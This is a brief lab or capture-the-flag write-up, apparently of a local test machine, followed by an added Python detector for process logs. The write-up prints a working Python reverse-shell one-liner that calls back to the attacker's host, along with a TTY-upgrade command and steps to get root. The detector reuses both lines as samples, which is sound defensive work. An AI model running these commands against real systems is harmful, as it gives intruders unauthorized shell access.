Running nmap to see information about the host:
nmap -A -T4 -p- 192.168.1.18 -vv

Let's run dirb on the site using -X .php to find PHP pages:
dirb http://192.168.1.18 -X .php

A page with the name shell.php is found. Ummmm, I ran it and I got:

And then using a Python script to connect while running nc -lvp 4444 on my machine:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And I got a shell... Breaking out of it:
python -c 'import pty; pty.spawn("/bin/bash")'
And if you get double characters, use this command:
stty raw -echo (I googled it 😀)
Going straight to home, we find we have user1, user2, user3, user4, user5, user6, user7, user8.
As I went from one to the next listing files, when I reached user3 I found a file named shell, ran it and I'm root, simple as that.
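
Seen from the defending side, the two python -c commands above have a recognisable shape in process-execution logs. The following is an added example, not part of the original write-up: it classifies logged command lines, and the sample records, function names and labels are constructed for illustration.

```python
import re
import shlex

# Indicators taken from the python -c one-liners shown in the write-up.
SOCKET_CONNECT = re.compile(r"socket\.socket\(.*?\.connect\(", re.S)
DUP2_STDIO = re.compile(r"os\.dup2\([^,]+,\s*([012])\)")
SHELL_PATH = re.compile(r"/bin/(?:ba)?sh\b")
PTY_SPAWN = re.compile(r"pty\.spawn\(")
PYTHON_BIN = re.compile(r"(?:.*/)?python[\d.]*")

def inline_python(cmdline):
    """Return the code passed to `python -c`, or None if there is none."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the logged command line
        return None
    if not argv or not PYTHON_BIN.fullmatch(argv[0]):
        return None
    for i, arg in enumerate(argv[:-1]):
        if i and arg == "-c":
            return argv[i + 1]
    return None

def classify(cmdline):
    """Label one exec record: reverse_shell, tty_upgrade, inline_python or ignore."""
    code = inline_python(cmdline)
    if code is None:
        return "ignore"
    has_shell = bool(SHELL_PATH.search(code))
    # Flag only when stdin, stdout and stderr are all duplicated from one source.
    stdio_taken = set(DUP2_STDIO.findall(code)) == {"0", "1", "2"}
    if SOCKET_CONNECT.search(code) and stdio_taken and has_shell:
        return "reverse_shell"
    if PTY_SPAWN.search(code) and has_shell:
        return "tty_upgrade"
    return "inline_python"

# Constructed exec records (hypothetical log content); the first two reuse
# the commands from the write-up, the last two are benign controls.
SAMPLE = [
    """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""",
    """python -c 'import pty; pty.spawn("/bin/bash")'""",
    """python3 -c 'print(1)'""",
    "ls -la /home/user3",
]

if __name__ == "__main__":
    for record in SAMPLE:
        print(classify(record), "<-", record[:60])
```

A web-server account running either of the first two patterns is worth an alert on its own, since neither is something a PHP application normally executes.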
